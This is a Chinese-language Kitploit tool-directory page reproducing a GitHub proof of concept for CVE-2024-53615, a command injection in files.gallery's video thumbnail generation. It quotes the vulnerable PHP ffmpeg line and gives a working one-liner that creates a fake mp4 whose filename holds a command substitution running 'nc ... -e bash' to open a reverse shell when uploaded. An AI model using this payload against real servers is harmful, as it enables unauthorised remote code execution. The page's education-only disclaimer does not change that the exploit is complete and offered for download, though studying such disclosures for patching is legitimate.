Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-53615 — CVE-2024-53615 | Kitploit
工具/GitHubGitHub/beune/cve-2024-53615
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlLearning & Education
GitHubbeune/cve-2024-53615

CVE-2024-53615

CVE-2024-53615

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-53615

Karl Ward 的 files.gallery v0.3.0 至 0.11.0 版本中视频缩略图渲染组件存在命令注入漏洞,允许远程攻击者通过精心构造的视频文件执行任意代码。 前置条件:

  • PATH 中存在 ffmpeg
  • config.php:'allow_upload' => true
  • PHP 配置中必须启用 exec

漏洞位于以下行(取自版本 0.9.12),该行用于生成视频预览:

root@kitploit:~
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';

由于 $this->path 可控,我们可以构造一个恶意文件,其文件名是一个 bash 命令替换。重要的是,该文件必须包含例如 mp4 魔术字节,且文件名必须以 .mp4 结尾:

root@kitploit:~
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'

如果我们上传此文件,并刷新页面使应用程序加载该文件,就能在本地机器上获得一个 shell。

注意:命令存储在文件名中,因此由于名称长度限制,反弹 shell 的可能性有限。

免责声明

此仓库仅供教育和研究目的使用。

滥用警告: 未经授权或恶意使用此工具是被严格禁止的,并可能违反当地、州或国际法律。作者对此代码的任何滥用行为不承担责任。

在部署此工具到任何环境之前,请始终获得适当授权。使用此项目即表示您同意以负责任和合乎道德的方式使用它。

下载工具